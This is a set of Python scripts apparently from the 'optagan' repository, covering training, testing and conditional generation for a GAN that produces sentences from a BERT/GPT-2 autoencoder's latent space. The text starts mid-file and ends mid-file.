## Variational auto-encoder(check this)
parser.add_argument("--prompt", type=str, default="")
parser.add_argument("--padding_text", type=str, default="")
parser.add_argument("--length", type=int, default=20)
parser.add_argument("--block_size", default=-1, type=int,
help="Optional input sequence length after tokenization."
"The training dataset will be truncated in block of this size for training."
"Default to the model max input length for single sentence inputs (take into account special tokens).")
parser.add_argument("--do_lower_case", action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--use_philly", action='store_true',
help="Use Philly for computing.")
parser.add_argument('--gloabl_step_eval', type=int, default=661,
help="Evaluate the results at the given global step")
# Load a trained Encoder model and vocabulary that you have fine-tuned
args = parser.parse_args()
global_step = args.gloabl_step_eval
torch.backends.cudnn.deterministic = True
args.device = torch.device("cuda" if args.cuda else "cpu")
args.n_gpu = torch.cuda.device_count()
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
args.encoder_model_type = args.encoder_model_type.lower()
args.decoder_model_type = args.decoder_model_type.lower()
output_encoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-encoder-{}'.format(global_step))
output_decoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-decoder-{}'.format(global_step))
checkpoints = [ [output_encoder_dir, output_decoder_dir] ]
# Load a trained Encoder model and vocabulary that you have fine-tuned
encoder_config_class, encoder_model_class, encoder_tokenizer_class = MODEL_CLASSES[args.encoder_model_type]
model_encoder = encoder_model_class.from_pretrained(output_encoder_dir, latent_size=args.latent_size)
tokenizer_encoder = encoder_tokenizer_class.from_pretrained(args.encoder_tokenizer_name if args.encoder_tokenizer_name else args.encoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_encoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_encoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_encoder.max_len_single_sentence)
# Load a trained Decoder model and vocabulary that you have fine-tuned
decoder_config_class, decoder_model_class, decoder_tokenizer_class = MODEL_CLASSES[args.decoder_model_type]
model_decoder = decoder_model_class.from_pretrained(output_decoder_dir, latent_size=args.latent_size)
tokenizer_decoder = decoder_tokenizer_class.from_pretrained(args.decoder_tokenizer_name if args.decoder_tokenizer_name else args.decoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_decoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_decoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_decoder.max_len_single_sentence)
# Chunyuan: Add Padding token to GPT2
special_tokens_dict = {'pad_token': '<PAD>', 'bos_token': '<BOS>', 'eos_token': '<EOS>'}
num_added_toks = tokenizer_decoder.add_special_tokens(special_tokens_dict)
logger.info('We have added {} tokens to GPT2'.format(num_added_toks))
model_decoder.resize_token_embeddings(len(tokenizer_decoder)) # Notice: resize_token_embeddings expect to receive the full size of the new vocabulary, i.e. the length of the tokenizer.
assert tokenizer_decoder.pad_token == '<PAD>'
train_loader = build_dataload_and_cache_examples(args, [tokenizer_encoder, tokenizer_decoder])
generator = cond_Generator(args.n_layers, args.block_dim, args.latent_size, args.n_classes)
critic = cond_Critic(args.n_layers, args.block_dim, args.latent_size, args.n_classes)
classifier = Classifier(args.latent_size, args.block_dim, args.n_classes)
if args.generator_dir!=None:
generator.load_state_dict(torch.load(args.generator_dir+'/generator_'+str(args.gloabl_step_eval)+'.th'))
critic.load_state_dict(torch.load(args.generator_dir+'/critic_'+str(args.gloabl_step_eval)+'.th'))
classifier.load_state_dict(torch.load(args.generator_dir+'/classifier_'+str(args.gloabl_step_eval)+'.th'))
cl_optimizer = optim.Adam(classifier.parameters(), lr=args.lr, betas=(0.5, 0.999))
g_optimizer = optim.Adam(generator.parameters(), lr=args.lr, betas=(0.5, 0.999))
c_optimizer = optim.Adam(critic.parameters(), lr=args.lr, betas=(0.5, 0.999))
if args.cuda:
generator = generator.cuda()
critic = critic.cuda()
classifier = classifier.cuda()
logger.info('G Parameters:{}'.format(sum([p.numel() for p in generator.parameters() if \
p.requires_grad])))
logger.info('C Parameters:{}'.format(sum([p.numel() for p in critic.parameters() if \
p.requires_grad])))
best_bleu = 0
reference = list()
with(open(args.valid_data_file,"r")) as valid:
for sents in valid:
reference.append(sents.replace("\n", ""))
for epoch in range(1, args.epochs + 1):
g_loss, c_loss = train(epoch)
data_test = list()
test_lab = torch.LongTensor([0]*100 + [1]*100 + [2]*100 + [3]*100 + [4]*100).to(args.device)
for i in range(5):
test_noise = torch.Tensor(np.random.normal(0, 1, (100, args.latent_size))).to(args.device)
test_z = generator(test_noise, test_lab[100*i:100*(i+1)]).data
new_sent = rollout_test(model_decoder, test_z, tokenizer_decoder, args.max_seq_length, 100, 0, 1)
data_test.extend(new_sent)
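# Model selection: BLEU-2 of the generated sentences against a validation sample
# (forward, a proxy for quality) and of the validation sample against the generations
# (backward, a proxy for diversity) are summed; the checkpoint with the best sum is saved.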
p_reference = random.sample(reference, 500)
data_test = [str(lab)+" "+str(sen) for lab,sen in zip(test_lab.tolist(), data_test)]
bleu = calc_blue_parallel_func(p_reference, data_test, 2, 500, True)
b_bleu = calc_blue_parallel_func(data_test, p_reference, 2, 500, True)
logger.info("Bleu-2:{:0.3f} | B-Bleu-2:{:0.3f}".format(bleu, b_bleu))
if (bleu+b_bleu) > best_bleu:
best_bleu = bleu + b_bleu
logger.info('* Saving. Best Score:{:0.3f} | Bleu-2:{:0.3f} | B-Bleu-2:{:0.3f}'.format(best_bleu, bleu, b_bleu))
torch.save(generator.state_dict(), args.output_dir+'/generator_'+str(args.gloabl_step_eval)+'.th')
torch.save(critic.state_dict(), args.output_dir+'/critic_'+str(args.gloabl_step_eval)+'.th')
torch.save(classifier.state_dict(), args.output_dir+'/classifier_'+str(args.gloabl_step_eval)+'.th')
2024-01-10 | Egojr/optagan | optagan~wgan_test.py
from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import logging
import torch
import torch.nn as nn
import numpy as np
from modules.gan import Generator
import glob
import os
import pickle
import random
import torch.nn.functional as F
from tqdm import tqdm, trange
from func import GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig, BertConfig
from func import GPT2LMHeadModel, GPT2Tokenizer, GPT2ForLatentConnector, GPT2ForLatentConnectorValueHead
from func import OpenAIGPTLMHeadModel, OpenAIGPTTokenizer
from func import XLNetLMHeadModel, XLNetTokenizer
from func import TransfoXLLMHeadModel, TransfoXLTokenizer
from func import BertForLatentConnector, BertTokenizer
from collections import defaultdict
import pdb
from modules.utils import rollout_test
MAX_LENGTH = int(10000) # Hardcoded max length to avoid infinite loop
ALL_MODELS = sum((tuple(conf.pretrained_config_archive_map.keys()) for conf in (GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig)), ())
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
MODEL_CLASSES = {
'gpt2': (GPT2Config, GPT2ForLatentConnector, GPT2Tokenizer),
'bert': (BertConfig, BertForLatentConnector, BertTokenizer),
'gpt2v': (GPT2Config, GPT2ForLatentConnectorValueHead, GPT2Tokenizer)
}
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--new_sent', type=int, default=1, help="Number of sentences to generate")
parser.add_argument('--n_layers', type=int, default=20, help="Number of layers of generator")
parser.add_argument('--block_dim', type=int, default=100)
parser.add_argument('--interval', type=int, default=10)
parser.add_argument('--cuda', type=bool, default=torch.cuda.is_available())
parser.add_argument('--generator_dir', default=None, type=str, required=True, help="Directory of GAN model checkpoint")
parser.add_argument("--checkpoint_dir", default=None, type=str, required=True,
help="The directory where checkpoints are saved.")
parser.add_argument("--output_dir", default=None, type=str, required=True,
help="The output directory where the model predictions and checkpoints will be written.")
parser.add_argument("--save", default=False, type=bool, help="Save results to file.")
parser.add_argument("--latent_size", default=32, type=int, help="Latent space dimension.")
parser.add_argument("--output_name", default="results", type=str, help="File name of output")
parser.add_argument("--batch_size", default=100, type=int, help="Batch size to generate outputs")
## Encoder options
parser.add_argument("--encoder_model_type", default="bert", type=str,
help="The encoder model architecture to be fine-tuned.")
parser.add_argument("--encoder_model_name_or_path", default="bert-base-cased", type=str,
help="The encoder model checkpoint for weights initialization.")
parser.add_argument("--encoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--encoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
## Decoder options
parser.add_argument("--decoder_model_type", default="gpt2", type=str,
help="The decoder model architecture to be fine-tuned.")
parser.add_argument("--decoder_model_name_or_path", default="gpt2", type=str,
help="The decoder model checkpoint for weights initialization.")
parser.add_argument("--decoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--decoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
parser.add_argument("--max_seq_length", default=512, type=int,
help="Optional input sequence length before tokenization. The sequence will be dropped if it is longer the max_seq_length")
parser.add_argument("--finetune_decoder", default=False, type=bool,
help="Uses finetuned decoder in output dir if true.")
## Variational auto-encoder(check this)
parser.add_argument("--top_k", type=int, default=0)
parser.add_argument("--top_p", type=float, default=1.0)
parser.add_argument("--prompt", type=str, default="")
parser.add_argument("--padding_text", type=str, default="")
parser.add_argument("--length", type=int, default=20)
parser.add_argument("--block_size", default=-1, type=int,
help="Optional input sequence length after tokenization."
"The training dataset will be truncated in block of this size for training."
"Default to the model max input length for single sentence inputs (take into account special tokens).")
parser.add_argument("--do_lower_case", action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--use_philly", action='store_true',
help="Use Philly for computing.")
parser.add_argument('--gloabl_step_eval', type=int, default=508523,
help="Evaluate the results at the given global step")
# Load a trained Encoder model and vocabulary that you have fine-tuned
args = parser.parse_args()
global_step = args.gloabl_step_eval
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.backends.cudnn.deterministic = True
args.device = torch.device("cuda" if args.cuda else "cpu")
args.n_gpu = torch.cuda.device_count()
if args.n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
args.encoder_model_type = args.encoder_model_type.lower()
args.decoder_model_type = args.decoder_model_type.lower()
output_encoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-encoder-{}'.format(global_step))
output_decoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-decoder-{}'.format(global_step))
if not args.finetune_decoder:
output_decoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-decoder-{}'.format(global_step))
else:
output_decoder_dir = os.path.join(args.output_dir, 'checkpoint-decoder-{}'.format(global_step))
checkpoints = [ [output_encoder_dir, output_decoder_dir] ]
# Load a trained Encoder model and vocabulary that you have fine-tuned
encoder_config_class, encoder_model_class, encoder_tokenizer_class = MODEL_CLASSES[args.encoder_model_type]
model_encoder = encoder_model_class.from_pretrained(output_encoder_dir, latent_size=args.latent_size)
tokenizer_encoder = encoder_tokenizer_class.from_pretrained(args.encoder_tokenizer_name if args.encoder_tokenizer_name else args.encoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_encoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_encoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_encoder.max_len_single_sentence)
# Load a trained Decoder model and vocabulary that you have fine-tuned
if not args.finetune_decoder:
decoder_config_class, decoder_model_class, decoder_tokenizer_class = MODEL_CLASSES[args.decoder_model_type]
else:
decoder_config_class, decoder_model_class, decoder_tokenizer_class = MODEL_CLASSES["gpt2v"]
model_decoder = decoder_model_class.from_pretrained(output_decoder_dir, latent_size=args.latent_size)
tokenizer_decoder = decoder_tokenizer_class.from_pretrained(args.decoder_tokenizer_name if args.decoder_tokenizer_name else args.decoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_decoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_decoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_decoder.max_len_single_sentence)
# Chunyuan: Add Padding token to GPT2
special_tokens_dict = {'pad_token': '<PAD>', 'bos_token': '<BOS>', 'eos_token': '<EOS>'}
num_added_toks = tokenizer_decoder.add_special_tokens(special_tokens_dict)
logger.info('We have added {} tokens to GPT2'.format(num_added_toks))
model_decoder.resize_token_embeddings(len(tokenizer_decoder)) # Notice: resize_token_embeddings expect to receive the full size of the new vocabulary, i.e. the length of the tokenizer.
assert tokenizer_decoder.pad_token == '<PAD>'
generator = Generator(args.n_layers, args.block_dim, args.latent_size)
if args.cuda:
generator = generator.cuda()
generator.load_state_dict(torch.load(args.generator_dir+'/generator_'+str(args.gloabl_step_eval)+'.th'))
generator.eval()
model_decoder.eval()
model_encoder.eval()
if args.save:
if not os.path.exists(args.output_dir+"/{}.txt".format(args.output_name)):
with open(args.output_dir+"/{}.txt".format(args.output_name), 'w'):
pass
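# Generation loop: sample standard-normal noise, map it through the trained generator to
# latent codes, and decode each code into text with the GPT-2 decoder via rollout_test
# (sampling controlled by --top_k and --top_p).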
for i in range(int(args.new_sent/args.batch_size)):
# sample noise
noise = torch.Tensor(np.random.normal(0, 1, (args.batch_size, args.latent_size))).to(args.device)
new_z = generator(noise).data
# create new sent
sents = rollout_test(model_decoder, new_z, tokenizer_decoder, args.max_seq_length, args.batch_size, args.top_k, args.top_p)
if args.save:
with open(args.output_dir+"/{}.txt".format(args.output_name), 'a') as file:
for i in sents:
file.write(i+"\n")
else:
for i in sents:
logger.info(i)
2024-01-10 | Egojr/optagan | optagan~cond_test.py
from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import logging
import torch
import torch.nn as nn
import numpy as np
from modules.gan import cond_Generator
import glob
import os
import pickle
import random
import torch.nn.functional as F
from tqdm import tqdm, trange
from func import GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig, BertConfig
from func import GPT2LMHeadModel, GPT2Tokenizer, GPT2ForLatentConnector, GPT2ForLatentConnectorValueHead
from func import OpenAIGPTLMHeadModel, OpenAIGPTTokenizer
from func import XLNetLMHeadModel, XLNetTokenizer
from func import TransfoXLLMHeadModel, TransfoXLTokenizer
from func import BertForLatentConnector, BertTokenizer
from collections import defaultdict
import pdb
from modules.utils import rollout_test
MAX_LENGTH = int(10000) # Hardcoded max length to avoid infinite loop
ALL_MODELS = sum((tuple(conf.pretrained_config_archive_map.keys()) for conf in (GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig)), ())
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
MODEL_CLASSES = {
'gpt2': (GPT2Config, GPT2ForLatentConnector, GPT2Tokenizer),
'bert': (BertConfig, BertForLatentConnector, BertTokenizer),
'gpt2v': (GPT2Config, GPT2ForLatentConnectorValueHead, GPT2Tokenizer)
}
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--new_sent', type=int, default=1, help="Number of sentences to generate")
parser.add_argument('--n_layers', type=int, default=20, help="Number of layers of generator")
parser.add_argument('--block_dim', type=int, default=100)
parser.add_argument('--interval', type=int, default=10)
parser.add_argument('--cuda', type=bool, default=torch.cuda.is_available())
parser.add_argument('--n_classes', type=int, default=4, help="Overall number of classes")
parser.add_argument('--generate_label', type=str, default="all", help="Either all for all labels, or number of label to generate")
parser.add_argument('--generator_dir', default=None, type=str, required=True, help="Directory of GAN model checkpoint")
parser.add_argument("--checkpoint_dir", default=None, type=str, required=True,
help="The directory where checkpoints are saved.")
parser.add_argument("--output_dir", default=None, type=str, required=True,
help="The output directory where the model predictions and checkpoints will be written.")
parser.add_argument("--save", default=False, type=bool, help="Save results to file.")
parser.add_argument("--latent_size", default=32, type=int, help="Latent space dimension.")
parser.add_argument("--output_name", default="results", type=str, help="File name of output")
parser.add_argument("--batch_size", default=100, type=int, help="Batch size to generate outputs")
## Encoder options
parser.add_argument("--encoder_model_type", default="bert", type=str,
help="The encoder model architecture to be fine-tuned.")
parser.add_argument("--encoder_model_name_or_path", default="bert-base-cased", type=str,
help="The encoder model checkpoint for weights initialization.")
parser.add_argument("--encoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--encoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
## Decoder options
parser.add_argument("--decoder_model_type", default="gpt2", type=str,
help="The decoder model architecture to be fine-tuned.")
parser.add_argument("--decoder_model_name_or_path", default="bert-base-cased", type=str,
help="The decoder model checkpoint for weights initialization.")
parser.add_argument("--decoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--decoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
parser.add_argument("--max_seq_length", default=512, type=int,
help="Optional input sequence length before tokenization. The sequence will be dropped if it is longer the max_seq_length")
parser.add_argument("--finetune_decoder", default=False, type=bool,
help="Uses finetuned decoder in output dir if true.")
## Variational auto-encoder(check this)
parser.add_argument("--temperature", type=float, default=1.0)
parser.add_argument("--top_k", type=int, default=0)
parser.add_argument("--top_p", type=float, default=1.0)
parser.add_argument("--prompt", type=str, default="")
parser.add_argument("--padding_text", type=str, default="")
parser.add_argument("--length", type=int, default=20)
parser.add_argument("--block_size", default=-1, type=int,
help="Optional input sequence length after tokenization."
"The training dataset will be truncated in block of this size for training."
"Default to the model max input length for single sentence inputs (take into account special tokens).")
parser.add_argument("--do_lower_case", action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--use_philly", action='store_true',
help="Use Philly for computing.")
parser.add_argument('--gloabl_step_eval', type=int, default=661,
help="Evaluate the results at the given global step")
# Load a trained Encoder model and vocabulary that you have fine-tuned
args = parser.parse_args()
global_step = args.gloabl_step_eval
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.backends.cudnn.deterministic = True
args.device = torch.device("cuda" if args.cuda else "cpu")
args.n_gpu = torch.cuda.device_count()
if args.n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
args.encoder_model_type = args.encoder_model_type.lower()
args.decoder_model_type = args.decoder_model_type.lower()
output_encoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-encoder-{}'.format(global_step))
if not args.finetune_decoder:
output_decoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-decoder-{}'.format(global_step))
else:
output_decoder_dir = os.path.join(args.output_dir, 'checkpoint-decoder-{}'.format(global_step))
checkpoints = [ [output_encoder_dir, output_decoder_dir] ]
# Load a trained Encoder model and vocabulary that you have fine-tuned
encoder_config_class, encoder_model_class, encoder_tokenizer_class = MODEL_CLASSES[args.encoder_model_type]
model_encoder = encoder_model_class.from_pretrained(output_encoder_dir, latent_size=args.latent_size)
tokenizer_encoder = encoder_tokenizer_class.from_pretrained(args.encoder_tokenizer_name if args.encoder_tokenizer_name else args.encoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_encoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_encoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_encoder.max_len_single_sentence)
# Load a trained Decoder model and vocabulary that you have fine-tuned
if not args.finetune_decoder:
decoder_config_class, decoder_model_class, decoder_tokenizer_class = MODEL_CLASSES[args.decoder_model_type]
else:
decoder_config_class, decoder_model_class, decoder_tokenizer_class = MODEL_CLASSES["gpt2v"]
model_decoder = decoder_model_class.from_pretrained(output_decoder_dir, latent_size=args.latent_size)
tokenizer_decoder = decoder_tokenizer_class.from_pretrained(args.decoder_tokenizer_name if args.decoder_tokenizer_name else args.decoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_decoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_decoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_decoder.max_len_single_sentence)
# Chunyuan: Add Padding token to GPT2
special_tokens_dict = {'pad_token': '<PAD>', 'bos_token': '<BOS>', 'eos_token': '<EOS>'}
num_added_toks = tokenizer_decoder.add_special_tokens(special_tokens_dict)
logger.info('We have added {} tokens to GPT2'.format(num_added_toks))
model_decoder.resize_token_embeddings(len(tokenizer_decoder)) # Notice: resize_token_embeddings expect to receive the full size of the new vocabulary, i.e. the length of the tokenizer.
assert tokenizer_decoder.pad_token == '<PAD>'
generator = cond_Generator(args.n_layers, args.block_dim, args.latent_size, args.n_classes)
if args.cuda:
generator = generator.to(args.device)
generator.load_state_dict(torch.load(args.generator_dir+'/generator_'+str(args.gloabl_step_eval)+'.th', map_location=torch.device(args.device)))
generator.eval()
model_decoder.eval()
model_encoder.eval()
if args.save:
if not os.path.exists(args.output_dir+"/{}.txt".format(args.output_name)):
with open(args.output_dir+"/{}.txt".format(args.output_name), 'w'):
pass
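# Label handling: with --generate_label all, the requested number of sentences is split
# evenly across the n_classes labels; otherwise every sentence is conditioned on the
# single label index passed in --generate_label.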
# generate based on label input
if args.generate_label == "all":
classes_lab = args.new_sent/args.n_classes
label = list()
for i in range(0, args.n_classes):
label.extend([i] * int(classes_lab))
label = torch.LongTensor(label).to(args.device)
else:
label = list()
label.extend(args.new_sent * [int(args.generate_label)])
label = torch.LongTensor(label).to(args.device)
# Get number of generation iterations
for i in range(0, int(args.new_sent/args.batch_size)):
# sample noise
noise = torch.Tensor(np.random.normal(0, 1, (args.batch_size, args.latent_size))).to(args.device)
new_z = generator(noise, label[i*args.batch_size:args.batch_size*(i+1)]).data
# create new sent
sents = rollout_test(model_decoder, new_z, tokenizer_decoder, args.max_seq_length, args.batch_size, args.top_k, args.top_p)
sents = [str(lab)+" "+str(sen) for lab,sen in zip(label.tolist()[i*args.batch_size:args.batch_size*(i+1)], sents)]
if args.save:
with open(args.output_dir+"/{}.txt".format(args.output_name), 'a') as file:
for i in sents:
file.write(i+"\n")
else:
for i in sents:
logger.info(i)
2024-01-10 | Egojr/optagan | optagan~optagan.py
from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import logging
import torch
import torch.nn as nn
import torch.optim as optim
import torch.autograd as autograd
import numpy as np
from torch.autograd import Variable
from modules.gan import Generator, Critic
import copy
import math
import glob
import os
import pickle
import random
import torch.nn.functional as F
from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler, TensorDataset
from torch.utils.data.distributed import DistributedSampler
from tqdm import tqdm, trange
from func import GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig, BertConfig
from func import GPT2LMHeadModel, GPT2Tokenizer, GPT2ForLatentConnector, GPT2ForLatentConnectorValueHead
from func import OpenAIGPTLMHeadModel, OpenAIGPTTokenizer
from func import XLNetLMHeadModel, XLNetTokenizer
from func import TransfoXLLMHeadModel, TransfoXLTokenizer
from func import BertForLatentConnector, BertTokenizer
from collections import defaultdict
from utils import (TextDataset_Split, TextDataset_2Tokenizers, BucketingDataLoader)
import pdb
from modules.utils import (calc_blue_parallel_func, pad_seq, rollout, rollout_test)
from transformers.modeling_utils import top_k_top_p_filtering
MAX_LENGTH = int(10000) # Hardcoded max length to avoid infinite loop
ALL_MODELS = sum((tuple(conf.pretrained_config_archive_map.keys()) for conf in (GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig)), ())
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
MODEL_CLASSES = {
'gpt2': (GPT2Config, GPT2ForLatentConnectorValueHead, GPT2Tokenizer),
'bert': (BertConfig, BertForLatentConnector, BertTokenizer)
}
def load_and_cache_examples(args, tokenizer):
if isinstance(tokenizer, list):
dataset = TextDataset_2Tokenizers(tokenizer, args, args.train_data_file, block_size=args.block_size)
else:
dataset = TextDataset_Split(tokenizer, args, args.train_data_file, block_size=args.block_size)
return dataset
def build_dataload_and_cache_examples(args, tokenizer):
if isinstance(tokenizer, list):
args.batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
file_path=args.train_data_file
dataloader = BucketingDataLoader(file_path, args.batch_size, args.max_seq_length, tokenizer, args, bucket=100, shuffle=True)
else:
pass
return dataloader
def compute_grad_penalty(critic, real_data, fake_data):
B = real_data.size(0)
alpha = torch.FloatTensor(np.random.random((B, 1)))
if args.cuda:
alpha = alpha.cuda()
sample = alpha*real_data + (1-alpha)*fake_data
sample.requires_grad_(True)
score = critic(sample)
outputs = torch.FloatTensor(B, 1).fill_(1.0) #args.latent_size
outputs.requires_grad_(False)
if args.cuda:
outputs = outputs.cuda()
grads = autograd.grad(
outputs=score,
inputs=sample,
grad_outputs=outputs,
create_graph=True,
retain_graph=True,
only_inputs=True)[0]
grad_penalty = ((grads.norm(2, dim=1) - 1.) ** 2).mean()
return grad_penalty
def train(epoch):
model_encoder.eval()
model_decoder.eval()
generator.train()
critic.train()
c_train_loss = 0.
g_train_loss = 0.
g_batches = 0
c_batches = 0
c_loss_0 = 1
g_loss_0 = 1
for i, x in enumerate(train_loader):
x = x[0]
if args.cuda:
x = x.cuda()
# Generate noise
B = args.per_gpu_train_batch_size
noise = torch.from_numpy(np.random.normal(0, 1, (B,
args.latent_size))).float()
if args.cuda:
noise = noise.cuda()
# Get original text latent embeddings
with torch.no_grad():
pooled_hidden_fea = model_encoder(x, attention_mask=(x > 0).float())[1]
mean, logvar = model_encoder.linear(pooled_hidden_fea).chunk(2, -1)
z_real = mean.squeeze(1)
# Evaluate and get losses
z_fake = generator(noise)
real_score = critic(z_real)
fake_score = critic(z_fake)
grad_penalty = compute_grad_penalty(critic, z_real.data, z_fake.data)
c_loss = -torch.mean(real_score) + torch.mean(fake_score) + \
args.gp_lambda*grad_penalty
fake_score = critic(generator(noise))
g_loss = -torch.mean(fake_score)
r_g = abs(((g_loss.item() - g_loss_0) / (g_loss_0 + 0.001)))
r_c = abs(((c_loss.item() - c_loss_0) / (c_loss_0 + 0.001)))
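# Adaptive update rule: r_c and r_g are the relative changes of the critic and generator
# losses since the previous batch. The critic is updated when its loss is still moving
# comparatively fast (scaled by (2 + epoch) / epoch, which favours critic updates in
# early epochs); otherwise the generator is updated.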
# Update critic or generator
if ((2 + epoch) / epoch) * r_c > r_g:
c_optimizer.zero_grad()
c_batches += 1
c_train_loss += c_loss.item()
c_loss.backward()
c_optimizer.step()
else:
g_optimizer.zero_grad()
g_batches += 1
g_train_loss += g_loss.item()
g_loss.backward()
g_optimizer.step()
c_loss_0 = c_loss.item()
g_loss_0 = g_loss.item()
if args.interval > 0 and i % args.interval == 0:
logger.info('Epoch: {} | Batch: {}/{} ({:.0f}%) | G Loss: {:.6f} | C Loss: {:.6f}'.format(
epoch, args.batch_size*i, len(train_loader.dataset),
100.*(args.batch_size*i)/len(train_loader.dataset),
g_loss.item(), c_loss.item()
))
test_noise = torch.Tensor(np.random.normal(0, 1, (1, args.latent_size))).to(args.device)
test_new_z = generator(test_noise).data
# create new sent
test_z = rollout_test(model_decoder, test_new_z, tokenizer_decoder, args.max_seq_length, 1, 0, 1)
logger.info("Text: {}".format(test_z))
c_train_loss /= c_batches + 1
g_train_loss /= g_batches + 1
logger.info('* (Train) Epoch: {} | G Loss: {:.4f} | C Loss: {:.4f} | Updates G: {} | Updates C: {}'.format(
epoch, g_train_loss, c_train_loss, g_batches, c_batches
))
return (g_train_loss, c_train_loss)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--epochs', type=int, default=15)
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--gp_lambda', type=int, default=10)
parser.add_argument('--n_layers', type=int, default=20, help="Number of layers of generator and critic")
parser.add_argument('--block_dim', type=int, default=100)
parser.add_argument('--interval', type=int, default=10, help="Steps before logging output")
parser.add_argument('--cuda', type=bool, default=torch.cuda.is_available())
# Optimus parameters
parser.add_argument("--train_data_file", default=None, type=str, required=True,
help="The input training data file (a text file).")
parser.add_argument("--valid_data_file", default=None, type=str, required=True,
help="The input validation data file (a text file).")
parser.add_argument("--checkpoint_dir", default=None, type=str, required=True,
help="The directory where checkpoints are saved.")
parser.add_argument('--generator_dir', default=None, type=str, help="Directory where GAN models are saved")
parser.add_argument("--output_dir", default=None, type=str, required=True,
help="The output directory where the model predictions and checkpoints will be written.")
parser.add_argument("--dataset", default='Snli', type=str, help="The dataset.")
parser.add_argument("--latent_size", default=32, type=int, help="Latent space dimension.")
## Encoder options
parser.add_argument("--encoder_model_type", default="bert", type=str,
help="The encoder model architecture to be fine-tuned.")
parser.add_argument("--encoder_model_name_or_path", default="bert-base-cased", type=str,
help="The encoder model checkpoint for weights initialization.")
parser.add_argument("--encoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--encoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
## Decoder options
parser.add_argument("--decoder_model_type", default="gpt2", type=str,
help="The decoder model architecture to be fine-tuned.")
parser.add_argument("--decoder_model_name_or_path", default="bert-base-cased", type=str,
help="The decoder model checkpoint for weights initialization.")
parser.add_argument("--decoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--decoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
parser.add_argument("--per_gpu_train_batch_size", default=1, type=int,
help="Batch size per GPU/CPU for training.")
parser.add_argument("--max_seq_length", default=512, type=int,
